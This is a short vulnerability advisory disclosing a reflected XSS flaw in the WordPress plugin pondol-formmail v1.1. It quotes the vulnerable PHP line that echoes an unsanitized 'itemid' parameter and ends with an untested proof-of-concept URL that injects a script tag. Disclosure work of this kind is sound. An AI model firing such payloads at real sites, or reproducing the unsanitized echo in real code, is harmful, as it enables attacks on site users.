Advisory #: 787
Title: Reflected XSS in wordpress plugin pondol-formmail v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/pondol-formmail
Downloads: 424
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: pondol-formmail
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./pondol-formmail/pages/admin-mail-info.php: 25: <input type="hidden" name="mainInfo_itemId" value="<?php echo $_GET["itemid"];?>"> The variable itemid appears to send unsanitized data back to the users browser.
CVE-ID: 2016-1000146
File:./pondol-formmail/pages/admin-mail-info.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid="><script>alert(1);</script><"